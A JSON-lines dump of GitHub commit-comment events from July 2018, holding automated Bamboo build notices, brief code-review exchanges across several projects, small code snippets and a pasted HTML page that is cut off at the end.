{"id":"7932758543","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630536,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-07T18:40:35Z","updated_at":"2018-07-07T18:40:35Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-07T18:40:35Z"}
{"id":"7932759409","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630539,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-07T18:41:25Z","updated_at":"2018-07-07T18:41:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:41:25Z"}
{"id":"7932759705","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630540,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-07T18:41:42Z","updated_at":"2018-07-07T18:41:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:41:42Z"}
{"id":"7932760090","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630541,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-07T18:42:04Z","updated_at":"2018-07-07T18:42:04Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-07T18:42:04Z"}
{"id":"7932760854","type":"CommitCommentEvent","actor":{"login":"Mandrewoid"},"repo":{"name":"RadeonOpenCompute/ROCm"},"payload":{"comment":{"id":29630542,"position":null,"line":null,"path":null,"commit_id":"fbcc9809de11eb13fff761ff5cfe5ca3fbd022dc","created_at":"2018-07-07T18:42:47Z","updated_at":"2018-07-07T18:42:47Z","author_association":"NONE","body":"@jedwards-AMD I have compute-firmware installed. If you remove the notes to uninstall it, people like me might not get it uninstalled? I'm not sure because I don't follow this project super closely, but it looks like package names got changed. \r\nI suggest you consider leaving the deleted lines in the readme to catch these edge cases?"}},"created_at":"2018-07-07T18:42:47Z"}
{"id":"7932760960","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630543,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-07T18:42:53Z","updated_at":"2018-07-07T18:42:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:42:53Z"}
{"id":"7932761773","type":"CommitCommentEvent","actor":{"login":"radkoo"},"repo":{"name":"radkoo/react"},"payload":{"comment":{"id":29630546,"position":null,"line":null,"path":null,"commit_id":"af44c8af7e837ae0d4df5d42543dddb69662745c","created_at":"2018-07-07T18:43:33Z","updated_at":"2018-07-07T18:43:33Z","author_association":"OWNER","body":"ok then"}},"created_at":"2018-07-07T18:43:33Z"}
{"id":"7932762362","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29630547,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-07T18:44:04Z","updated_at":"2018-07-07T18:44:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T18:44:04Z"}
{"id":"7932765024","type":"CommitCommentEvent","actor":{"login":"pkboom"},"repo":{"name":"pkboom/tips"},"payload":{"comment":{"id":29630552,"position":null,"line":null,"path":null,"commit_id":"58abd1d4ec44af754e34495f299e136c45bdb2a5","created_at":"2018-07-07T18:46:11Z","updated_at":"2018-07-07T18:46:11Z","author_association":"OWNER","body":"[, $last] = ['John', 'Doe'];\r\nvar_dump($last); // 'Doe'\r\n\r\n[$user1, $user2] = factory(User::class, 2)->create();\r\n\r\npreg_match('/(\\d{3})-\\d{3}-(\\d{4})/', '555-666-7777', $matches);\r\n\r\n[,$firstThree] = $matches;\r\n[,,$lastFour] = $matches;\r\n\r\nvar_dump($firstThree); // 555\r\nvar_dump($lastFour); // 7777"}},"created_at":"2018-07-07T18:46:11Z"}
{"id":"7932765845","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":29630553,"position":null,"line":null,"path":null,"commit_id":"1d118afd17659287520417afe7887dec4fb85531","created_at":"2018-07-07T18:46:45Z","updated_at":"2018-07-07T18:46:45Z","author_association":"MEMBER","body":"Nice catch! ;)"}},"created_at":"2018-07-07T18:46:45Z"}
{"id":"7932766120","type":"CommitCommentEvent","actor":{"login":"FunkyCosmonaut"},"repo":{"name":"FunkyCosmonaut/Math-Tools"},"payload":{"comment":{"id":29630554,"position":null,"line":null,"path":null,"commit_id":"4a605ec84241f61e15f073a1082e7899c9ddef90","created_at":"2018-07-07T18:47:01Z","updated_at":"2018-07-07T18:47:01Z","author_association":"OWNER","body":"Hella inefficient, breaks with large numbers"}},"created_at":"2018-07-07T18:47:01Z"}
{"id":"7932766693","type":"CommitCommentEvent","actor":{"login":"Formdude"},"repo":{"name":"Formdude/Wiki"},"payload":{"comment":{"id":29630556,"position":null,"line":null,"path":null,"commit_id":"14ecf58ff0204f7e3b9e97f6a52ec821230cd1ab","created_at":"2018-07-07T18:47:28Z","updated_at":"2018-07-07T18:47:28Z","author_association":"OWNER","body":"Removed direwolf 1.10 (shutdown)\r\nAdded Beyond3 (Reset of 2, removed)\r\nAdded Skyfactory 3 and 4 (1 and 2 reset, major pack changes, removed)\r\nRemoved polite2 (shutdown)"}},"created_at":"2018-07-07T18:47:28Z"}
{"id":"7932768551","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"persianpros/enigma2"},"payload":{"comment":{"id":29630559,"position":null,"line":null,"path":null,"commit_id":"92f6acc648e341b0125b91a6815977307878e07c","created_at":"2018-07-07T18:49:01Z","updated_at":"2018-07-07T18:49:01Z","author_association":"OWNER","body":"Also \"Bit\" to \"bit\" after PLi merge ;)"}},"created_at":"2018-07-07T18:49:01Z"}
{"id":"7932769148","type":"CommitCommentEvent","actor":{"login":"AmyBSOD"},"repo":{"name":"AmyBSOD/Amylona"},"payload":{"comment":{"id":29630560,"position":null,"line":null,"path":null,"commit_id":"ec2565b8bdc91b647c0516b32aee692ce0259e8d","created_at":"2018-07-07T18:49:31Z","updated_at":"2018-07-07T18:49:31Z","author_association":"OWNER","body":"This seems to crash the game..."}},"created_at":"2018-07-07T18:49:31Z"}
{"id":"7932769223","type":"CommitCommentEvent","actor":{"login":"MindTooth"},"repo":{"name":"srcery-colors/srcery"},"payload":{"comment":{"id":29630561,"position":6,"line":64,"path":"index.html","commit_id":"036df984f353b26f7386c4865e1b1d14b3e24ad2","created_at":"2018-07-07T18:49:35Z","updated_at":"2018-07-07T18:49:35Z","author_association":"MEMBER","body":"Can you test with only `m-auto md:w-3/4` and remove the `w-full` below?"}},"created_at":"2018-07-07T18:49:35Z"}
{"id":"7932770504","type":"CommitCommentEvent","actor":{"login":"roosta"},"repo":{"name":"srcery-colors/srcery"},"payload":{"comment":{"id":29630563,"position":6,"line":64,"path":"index.html","commit_id":"036df984f353b26f7386c4865e1b1d14b3e24ad2","created_at":"2018-07-07T18:50:37Z","updated_at":"2018-07-07T18:50:37Z","author_association":"MEMBER","body":"sure thing"}},"created_at":"2018-07-07T18:50:37Z"}
{"id":"7932773171","type":"CommitCommentEvent","actor":{"login":"Gymnasiast"},"repo":{"name":"OpenRCT2/objects"},"payload":{"comment":{"id":29630570,"position":5,"line":6,"path":"objects/rct2/ride/rct2.amt1.json","commit_id":"cd9b87b0ab6b09723d72cdd1e6f8cab352300dcf","created_at":"2018-07-07T18:53:00Z","updated_at":"2018-07-07T18:53:00Z","author_association":"MEMBER","body":"AMT = Arrow Mine Train"}},"created_at":"2018-07-07T18:53:00Z"}
{"id":"7932773178","type":"CommitCommentEvent","actor":{"login":"tltctw"},"repo":{"name":"tltctw/tltctw.github.io"},"payload":{"comment":{"id":29630571,"position":null,"line":null,"path":null,"commit_id":"d7335a276a23e9190cd8d7a74734e9caa2af9977","created_at":"2018-07-07T18:53:01Z","updated_at":"2018-07-07T18:53:01Z","author_association":"OWNER","body":"<html>\r\n<head>\r\n<title>设置有效期限</title>\r\n<meta http-equive=\"expires\" content=\"Web, 3 july 2018 11:25:00 GMT\">\r\n</head>\r\n<body>\r\n一起改变时间吧\r\n</body>\r\n</html>"}},"created_at":"2018-07-07T18:53:01Z"}
{"id":"7932773701","type":"CommitCommentEvent","actor":{"login":"MindTooth"},"repo":{"name":"srcery-colors/srcery"},"payload":{"comment":{"id":29630572,"position":81,"line":96,"path":"index.html","commit_id":"7a8adcce1d9e4a190e27b4be9d7a2f1648a424e5","created_at":"2018-07-07T18:53:24Z","updated_at":"2018-07-07T18:53:24Z","author_association":"MEMBER","body":"This is to remedy the padding on each element when I tried creating a grid.  As a way to cancel it.  And this is the one we have been speaking about 😉 \r\n\r\nhttps://tailwindcss.com/docs/examples/grids#column-spacing"}},"created_at":"2018-07-07T18:53:24Z"}
{"id":"7932775786","type":"CommitCommentEvent","actor":{"login":"ljacqu"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":29630573,"position":null,"line":null,"path":null,"commit_id":"1d118afd17659287520417afe7887dec4fb85531","created_at":"2018-07-07T18:54:36Z","updated_at":"2018-07-07T18:54:36Z","author_association":"MEMBER","body":"Possibly a stupid question but should `unresolvedPlayerHostname` maybe be a Set?"}},"created_at":"2018-07-07T18:54:36Z"}
{"id":"7932776539","type":"CommitCommentEvent","actor":{"login":"DNx5"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":29630574,"position":null,"line":null,"path":null,"commit_id":"1d118afd17659287520417afe7887dec4fb85531","created_at":"2018-07-07T18:55:12Z","updated_at":"2018-07-07T18:55:12Z","author_association":"MEMBER","body":"@ljacqu Aha, you are right!"}},"created_at":"2018-07-07T18:55:12Z"}
{"id":"7932778424","type":"CommitCommentEvent","actor":{"login":"nbougalis"},"repo":{"name":"vinniefalco/beast"},"payload":{"comment":{"id":29630576,"position":64,"line":64,"path":"include/boost/beast/core/detail/chacha.hpp","commit_id":"61afd699f370d7bcdbc7f3107b22df22d95ce3fe","created_at":"2018-07-07T18:56:48Z","updated_at":"2018-07-07T18:56:48Z","author_association":"NONE","body":"I'd remove these two `friend` functions; while they are meant to comply with the standard-mandated [`RandomNumberEngine`](https://en.cppreference.com/w/cpp/named_req/RandomNumberEngine) interface requirements, you don't really need that (and have, in fact, removed other relevant code).\r\n\r\nLess code is better code anyways."}},"created_at":"2018-07-07T18:56:48Z"}
{"id":"7932780014","type":"CommitCommentEvent","actor":{"login":"nicholasjhorton"},"repo":{"name":"Amherst-Statistics/IS5inR"},"payload":{"comment":{"id":29630579,"position":null,"line":null,"path":null,"commit_id":"f2095cf00b775ac2e7daef98f699ad046408c4c0","created_at":"2018-07-07T18:58:10Z","updated_at":"2018-07-07T18:58:10Z","author_association":"CONTRIBUTOR","body":"can you use \"calculate\" instead of \"find\"?  We spoke about the do() functions (should be singular).  Otherwise this is shaping up well."}},"created_at":"2018-07-07T18:58:10Z"}
{"id":"7932780486","type":"CommitCommentEvent","actor":{"login":"enaut"},"repo":{"name":"Hideakiii/School-Tasks"},"payload":{"comment":{"id":29630580,"position":99,"line":141,"path":"Avalonion_v4/Avalonion_v6.py","commit_id":"72238f44c5a591fc2395a3dd066aa3f036a4f750","created_at":"2018-07-07T18:58:36Z","updated_at":"2018-07-07T18:58:36Z","author_association":"CONTRIBUTOR","body":"Die Koordinaten hier sind so, dass ich die Hindernisse nie sehe... also die `-700` müssten positiv sein - Oben links ist `0,0` nach rechts und unten werden die Zahlen größer... Da sich das Hindernis nach oben bewegt sollte es ganz unten anfangen also bei `game.display_height`. Für die Hindernisse hatte ich auch einfach das Bild genommen, man könnte vermutlich auch in das \"Object sprite\" ein Viereck oder so zeichnen."}},"created_at":"2018-07-07T18:58:36Z"}
{"id":"7932780715","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29630581,"position":null,"line":null,"path":null,"commit_id":"0a5fe6d0294cfc2a0b7a1444131b37502282d7fb","created_at":"2018-07-07T18:58:48Z","updated_at":"2018-07-07T18:58:48Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Personalizar a tela Index de acordo com o usuário.](https://trello.com/c/GixCDZCF/201-personalizar-a-tela-index-de-acordo-com-o-usu%C3%A1rio)"}},"created_at":"2018-07-07T18:58:48Z"}
{"id":"7932780743","type":"CommitCommentEvent","actor":{"login":"roosta"},"repo":{"name":"srcery-colors/srcery"},"payload":{"comment":{"id":29630582,"position":81,"line":96,"path":"index.html","commit_id":"7a8adcce1d9e4a190e27b4be9d7a2f1648a424e5","created_at":"2018-07-07T18:58:49Z","updated_at":"2018-07-07T18:58:49Z","author_association":"MEMBER","body":"ok, will fix"}},"created_at":"2018-07-07T18:58:49Z"}
{"id":"7932781407","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29630583,"position":null,"line":null,"path":null,"commit_id":"2c7c9f986c6b3880adff7783b1e9056e99ad6f62","created_at":"2018-07-07T18:59:22Z","updated_at":"2018-07-07T18:59:22Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Personalizar a tela Index de acordo com o usuário.](https://trello.com/c/GixCDZCF/201-personalizar-a-tela-index-de-acordo-com-o-usu%C3%A1rio)"}},"created_at":"2018-07-07T18:59:22Z"}
{"id":"7932781543","type":"CommitCommentEvent","actor":{"login":"MindTooth"},"repo":{"name":"srcery-colors/srcery"},"payload":{"comment":{"id":29630584,"position":null,"line":null,"path":null,"commit_id":"83f52648d6fbe8406aff993f9869be6cb3ca566d","created_at":"2018-07-07T18:59:28Z","updated_at":"2018-07-07T18:59:28Z","author_association":"MEMBER","body":"What's your thoughts on merge commits? 😊 "}},"created_at":"2018-07-07T18:59:28Z"}
{"id":"7932782398","type":"CommitCommentEvent","actor":{"login":"enaut"},"repo":{"name":"Hideakiii/School-Tasks"},"payload":{"comment":{"id":29630588,"position":17,"line":40,"path":"Avalonion_v4/Avalonion_v6.py","commit_id":"72238f44c5a591fc2395a3dd066aa3f036a4f750","created_at":"2018-07-07T19:00:11Z","updated_at":"2018-07-07T19:00:11Z","author_association":"CONTRIBUTOR","body":"Ah hier an der Stelle würde vielleicht `self.image = Img` mehr Sinn machen... Also dass das Bild was dem Spieler gegeben wird auch verwendet wird."}},"created_at":"2018-07-07T19:00:11Z"}
{"id":"7932783242","type":"CommitCommentEvent","actor":{"login":"Abdulrahman56"},"repo":{"name":"Abdulrahman56/CookiesApp"},"payload":{"comment":{"id":29630598,"position":null,"line":null,"path":null,"commit_id":"d15da91e97807f0995dbd2a74fcf7f5b41db4633","created_at":"2018-07-07T19:00:38Z","updated_at":"2018-07-07T19:00:38Z","author_association":"OWNER","body":"I want help in this application It cost me a few days but it was not published on app store\r\nand these errors:\r\n\r\nPerformance - App Completeness\r\n\r\n**We discovered one or more bugs in your app when reviewed on iPad and iPhone running iOS 11.3.1 on Wi-Fi connected to an IPv6 network.**\r\n\r\nPlease see attached screenshots for details.\r\n\r\n**Next Steps**\r\n\r\nTo resolve this issue, please run your app on a device to identify any issues, then revise and resubmit your app for review.\r\n\r\nIf we misunderstood the intended behavior of your app, please reply to this message in Resolution Center to provide information on how these features were intended to work.\r\n\r\nFor new apps, uninstall all previous versions of your app from a device, then install and follow the steps to reproduce the issue. For updates, install the new version as an update to the previous version, then follow the steps to reproduce the issue.\r\n\r\nResources\r\n\r\nFor information about testing your app and preparing it for review, please see Technical Note TN2431: App Testing Guide.\r\n\r\nFor a networking overview, please review About Networking. For a more specific overview of App Review’s IPv6 requirements, please review the IPv6 and App Review discussion on the Apple Developer Forum."}},"created_at":"2018-07-07T19:00:38Z"}
{"id":"7932783290","type":"CommitCommentEvent","actor":{"login":"asfernandes"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29630599,"position":7,"line":84,"path":"src/common/classes/alloc.h","commit_id":"69523f1886e967cd1491bc4da9939528b404d288","created_at":"2018-07-07T19:00:40Z","updated_at":"2018-07-07T19:00:40Z","author_association":"MEMBER","body":"Because of this `#elif (SIZEOF_VOID_P == 4) && (ALLOC_ALIGNMENT == 16)`"}},"created_at":"2018-07-07T19:00:40Z"}
{"id":"7932783668","type":"CommitCommentEvent","actor":{"login":"FakelsHub"},"repo":{"name":"phobos2077/sfall"},"payload":{"comment":{"id":29630600,"position":19,"line":478,"path":"sfall/Modules/Scripting/Handlers/Interface.cpp","commit_id":"2a20209bb81a8824cd2d97209d89e5f2d9292093","created_at":"2018-07-07T19:00:56Z","updated_at":"2018-07-07T19:00:56Z","author_association":"CONTRIBUTOR","body":"I know that I made a mistake here, did not put the check.\r\nYou did everything right, but the verification put not in the wrong place, the code gets two checks instead of one. (it's optimization, maybe the compiler will fix it)."}},"created_at":"2018-07-07T19:00:56Z"}
{"id":"7932783890","type":"CommitCommentEvent","actor":{"login":"urmt"},"repo":{"name":"TransitionaResourceMonetarySystem-TRMS/executiveSummary"},"payload":{"comment":{"id":29630601,"position":null,"line":null,"path":null,"commit_id":"461440d486b8d74944a3898bb3c4fb5eae096615","created_at":"2018-07-07T19:01:05Z","updated_at":"2018-07-07T19:01:05Z","author_association":"CONTRIBUTOR","body":"erased"}},"created_at":"2018-07-07T19:01:05Z"}
{"id":"7932783945","type":"CommitCommentEvent","actor":{"login":"draknyte1"},"repo":{"name":"GTNewHorizons/GT5-Unofficial"},"payload":{"comment":{"id":29630602,"position":null,"line":null,"path":null,"commit_id":"3dd814f769874e087858d0b10d588f745198c93e","created_at":"2018-07-07T19:01:08Z","updated_at":"2018-07-07T19:01:08Z","author_association":"NONE","body":"Gonna assume 5.08 requires it."}},"created_at":"2018-07-07T19:01:08Z"}
{"id":"7932783973","type":"CommitCommentEvent","actor":{"login":"JohnnyNatrium"},"repo":{"name":"kduske/TrenchBroom"},"payload":{"comment":{"id":29630603,"position":null,"line":null,"path":null,"commit_id":"d87df3dcdfb5929c6aef86a2288002615c5278e7","created_at":"2018-07-07T19:01:09Z","updated_at":"2018-07-07T19:01:09Z","author_association":"NONE","body":"That's great! Could you give me an indication of which characters are 'illegal' in the current RC and are causing the infinite loop? I'm having an impossible time trying to edit the .def file to get it to work with the current iteration of TB. I'm replacing every instance of characters in a way that letters appear at the start of words, but it seems I'm still coming up short because it still hangs (and quite possibly eliminating a lot of things unnecessarily)."}},"created_at":"2018-07-07T19:01:09Z"}
{"id":"7932784467","type":"CommitCommentEvent","actor":{"login":"rdwatters"},"repo":{"name":"gohugoio/hugo"},"payload":{"comment":{"id":29630604,"position":null,"line":null,"path":null,"commit_id":"dea71670c059ab4d5a42bd22503f18c087dd22d4","created_at":"2018-07-07T19:01:30Z","updated_at":"2018-07-07T19:01:30Z","author_association":"CONTRIBUTOR","body":"@bep Not sure if the idea is that the above description is going to be used directly in the docs, but thought I would mention `$styles` and not `$css`. Pretty minute detail, but I noticed while trying to test new SASS features locally :smile:\r\n\r\n```\r\n{{ $css := resources.Get \"styles.scss\" | toCSS | postCSS | minify | fingerprint }}\r\n<link rel=\"stylesheet\" href=\"{{ $styles.RelPermalink }}\" integrity=\"{{ $styles.Data.Digest }}\" media=\"screen\">\r\n```"}},"created_at":"2018-07-07T19:01:30Z"}
{"id":"7932784670","type":"CommitCommentEvent","actor":{"login":"enaut"},"repo":{"name":"Hideakiii/School-Tasks"},"payload":{"comment":{"id":29630605,"position":133,"line":179,"path":"Avalonion_v4/Avalonion_v6.py","commit_id":"72238f44c5a591fc2395a3dd066aa3f036a4f750","created_at":"2018-07-07T19:01:41Z","updated_at":"2018-07-07T19:01:41Z","author_association":"CONTRIBUTOR","body":"Das sieht gut aus, mit prints muss man natürlich aufpassen, dass man nicht aufgrund zu vieler Ausgaben Fehler übersieht und sich dann wundert warum es nicht geht."}},"created_at":"2018-07-07T19:01:41Z"}
{"id":"7932785926","type":"CommitCommentEvent","actor":{"login":"mitchej123"},"repo":{"name":"GTNewHorizons/GT5-Unofficial"},"payload":{"comment":{"id":29630607,"position":null,"line":null,"path":null,"commit_id":"3dd814f769874e087858d0b10d588f745198c93e","created_at":"2018-07-07T19:02:46Z","updated_at":"2018-07-07T19:02:46Z","author_association":"COLLABORATOR","body":"ULV conveyor caused the crash"}},"created_at":"2018-07-07T19:02:46Z"}
{"id":"7932790798","type":"CommitCommentEvent","actor":{"login":"singhv04"},"repo":{"name":"singhv04/Library-codemix-dialogue-dataset-generation-and-dialogue-act-classification"},"payload":{"comment":{"id":29630611,"position":null,"line":null,"path":null,"commit_id":"f67492fa03871ba5f00c97405e1b31ce89a07aa5","created_at":"2018-07-07T19:06:30Z","updated_at":"2018-07-07T19:06:30Z","author_association":"OWNER","body":"### **APPROACH 1**\r\n\r\n- Required tools: isc_tokenizer(https://bitbucket.org/iscnlp/tokenizer)\r\n\r\n\r\n- Programming language:Python 3.6 (Anaconda:Spyder)\r\n\r\n- Libraries used: -openpyxl (for reading the excel file) -xlwt (for writing .xls file)\r\n\r\n\r\n- 1. Steps to run the program:\r\n\r\n1.  -just import the libraries used \r\n2. -install the tool (isc_tokenizer) \r\n3. -make sure that input file (kitni_m) is in the same path as specified in the code\r\n4. -output will be stored in file named output.xls file\r\n\r\n**Note**:Output file is alreaDy attached.If want to run the program again delete the output file which will be generated once the code runs.The output that will come after the compilation can be seen in the RESULT ms-word file."}},"created_at":"2018-07-07T19:06:30Z"}
{"id":"7932791713","type":"CommitCommentEvent","actor":{"login":"MPX4132"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29630612,"position":null,"line":null,"path":null,"commit_id":"ee73b8ec54aa746eecfb0851fe3fe74d89555c68","created_at":"2018-07-07T19:07:14Z","updated_at":"2018-07-07T19:07:14Z","author_association":"MEMBER","body":"That makes sense."}},"created_at":"2018-07-07T19:07:14Z"}
{"id":"7932791977","type":"CommitCommentEvent","actor":{"login":"ladyada"},"repo":{"name":"adafruit/Fritzing-Library"},"payload":{"comment":{"id":29630613,"position":null,"line":null,"path":null,"commit_id":"02baa2920f6538727b236a77c542376344f9f897","created_at":"2018-07-07T19:07:28Z","updated_at":"2018-07-07T19:07:28Z","author_association":"MEMBER","body":"@kattni ^"}},"created_at":"2018-07-07T19:07:28Z"}
{"id":"7932793555","type":"CommitCommentEvent","actor":{"login":"roosta"},"repo":{"name":"srcery-colors/srcery"},"payload":{"comment":{"id":29630618,"position":null,"line":null,"path":null,"commit_id":"83f52648d6fbe8406aff993f9869be6cb3ca566d","created_at":"2018-07-07T19:08:50Z","updated_at":"2018-07-07T19:08:50Z","author_association":"MEMBER","body":"I don't mind them. I used to rebase quite often before to avoid those, but that works nice and dandy when I code alone but as soon as anyone else is involved it can turn into a nightmare."}},"created_at":"2018-07-07T19:08:50Z"}
{"id":"7932794463","type":"CommitCommentEvent","actor":{"login":"Nhung-Hoang"},"repo":{"name":"Nhung-Hoang/skillcrush-104"},"payload":{"comment":{"id":29630619,"position":1,"line":1,"path":"advice/nhunghoang-advice.html","commit_id":"8167ffc2148d13b6794d5c41b7f3df3cca8aa502","created_at":"2018-07-07T19:09:39Z","updated_at":"2018-07-07T19:09:39Z","author_association":"OWNER","body":"Skip to content\r\n\r\n\r\n  \r\nPull requests \r\nIssues \r\nMarketplace \r\nExplore \r\n \r\n\r\n\r\nSign out \r\n\r\n\r\n Watch \r\n0 \r\n Star \r\n0 \r\n Fork \r\n1,861 \r\n\r\nNhung-Hoang/skillcrush-104 \r\nforked from skillcrush/skillcrush-104 \r\n Code \r\n Pull requests 0 \r\n Projects 0 \r\n Wiki \r\n Insights \r\n Settings \r\nBranch: master \r\nFind file \r\nCopy path \r\nskillcrush-104/advice/AskAlicia-advice.html \r\n8b590fa on Aug 9 2017 \r\n AliciaMc15 Ask Alicia html page added \r\n1 contributor \r\n \r\nRaw\r\nBlame\r\nHistory\r\n   \r\n39 lines (31 sloc) 1.38 KB \r\n\r\n<!DOCTYPE html>\r\n\r\n<html>\r\n\r\n<head>\r\n\r\n\t<meta charset=\"utf-8\">\r\n\r\n\t<link rel=\"stylesheet\" type=\"text/css\" href=\"../css/style.css\">\r\n\r\n\r\n\r\n\t<!-- replace Skillcrush with your name here -->\r\n\r\n\t<title>Alicia's Advice For Front end web development Newbies</title>\r\n\r\n</head>\r\n\r\n\r\n\r\n<!-- replace skillcrush with your name here -->\r\n\r\n<body class=\"AskAlicia-advice\">\r\n\r\n\t<header>\r\n\r\n\t\t<a href=\"../index.html\">Back to Main Page</a>\r\n\r\n\t\t<h1>Hi my name is Alicia and I have some advice for you!</h1>\r\n\r\n\t</header>\r\n\r\n\r\n\r\n\t<section>\r\n\r\n\t\t<div 